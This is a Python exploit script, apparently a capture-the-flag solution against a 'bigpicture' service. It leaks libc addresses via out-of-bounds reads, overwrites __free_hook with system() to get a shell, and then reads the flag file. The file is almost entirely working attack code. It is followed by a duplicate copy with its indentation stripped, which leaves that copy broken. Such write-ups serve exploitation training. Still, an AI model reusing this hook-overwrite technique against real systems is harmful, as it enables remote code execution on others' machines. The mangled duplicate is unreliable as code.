autotaker/exploit.py

## exploit.py
import subprocess
import struct
import binascii
import random

remote = True
if remote:
    cmd = "nc bigpicture.chal.pwning.xxx 420"
else:
    cmd = "./bigpicture"
pr = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE)

def send(s):
    pr.stdin.write(s)
    pr.stdin.flush()
    print("SEND:", s)
def recv():
    line = pr.stdout.readline()
    print("RECV:", line)
    return line

def send_cmd(addr,z = 0x41):
    if addr >= 0:
        x = addr // 1000
        y = addr % 1000
    else:
        x = -(-addr // 1000)
        y = -(-addr % 1000)
    send((b"%d , %d , %c\n" % (x,y,z)))

recv() # lets draw...
send(b'1000 x 1000\n')

libc_base_relative = -0x4e5010
if remote:
    libc_base_relative += 0x26000 - 0x2f000# random.randrange(0x1000)

print(hex(libc_base_relative))

libc_IO_stderr_relative = libc_base_relative + 0x3c4548
libc_free_hook_relative = libc_base_relative + 0x3c57a8
for i in range(6):
    send_cmd(libc_IO_stderr_relative + i)
    # send_cmd(libc_base_relative + i)
d = 0
r = 1
x = b''
for i in range(6):
    l = recv()
    d += r * l[-3]
    x += l[-3:-2]
    r *= 256
print(binascii.hexlify(x))
libc_base =  d - 0x3c45c3
libc_system = libc_base + 0x45390
libc_system_str = struct.pack('<Q', libc_base + 0x45390)
print("libc_base", hex(libc_base))


shell = b'sh'
for i in range(len(shell)):
    send_cmd(i, shell[i])

for i in range(len(libc_system_str)):
    ch = libc_system_str[i]
    if ch != 0:
        send_cmd(libc_free_hook_relative + i, ch)

send(b'quit\n')
send(b'ls \n')
send(b'cat /home/bigpicture/flag \n')
send(b'exit\n')

while recv():
    pass
	import subprocess
	import struct
	import binascii
	import random

	remote = True
	if remote:
	cmd = "nc bigpicture.chal.pwning.xxx 420"
	else:
	cmd = "./bigpicture"
	pr = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE)

	def send(s):
	pr.stdin.write(s)
	pr.stdin.flush()
	print("SEND:", s)
	def recv():
	line = pr.stdout.readline()
	print("RECV:", line)
	return line

	def send_cmd(addr,z = 0x41):
	if addr >= 0:
	x = addr // 1000
	y = addr % 1000
	else:
	x = -(-addr // 1000)
	y = -(-addr % 1000)
	send((b"%d , %d , %c\n" % (x,y,z)))

	recv() # lets draw...
	send(b'1000 x 1000\n')

	libc_base_relative = -0x4e5010
	if remote:
	libc_base_relative += 0x26000 - 0x2f000# random.randrange(0x1000)

	print(hex(libc_base_relative))

	libc_IO_stderr_relative = libc_base_relative + 0x3c4548
	libc_free_hook_relative = libc_base_relative + 0x3c57a8
	for i in range(6):
	send_cmd(libc_IO_stderr_relative + i)
	# send_cmd(libc_base_relative + i)
	d = 0
	r = 1
	x = b''
	for i in range(6):
	l = recv()
	d += r * l[-3]
	x += l[-3:-2]
	r *= 256
	print(binascii.hexlify(x))
	libc_base = d - 0x3c45c3
	libc_system = libc_base + 0x45390
	libc_system_str = struct.pack('<Q', libc_base + 0x45390)
	print("libc_base", hex(libc_base))


	shell = b'sh'
	for i in range(len(shell)):
	send_cmd(i, shell[i])

	for i in range(len(libc_system_str)):
	ch = libc_system_str[i]
	if ch != 0:
	send_cmd(libc_free_hook_relative + i, ch)

	send(b'quit\n')
	send(b'ls \n')
	send(b'cat /home/bigpicture/flag \n')
	send(b'exit\n')

	while recv():
	pass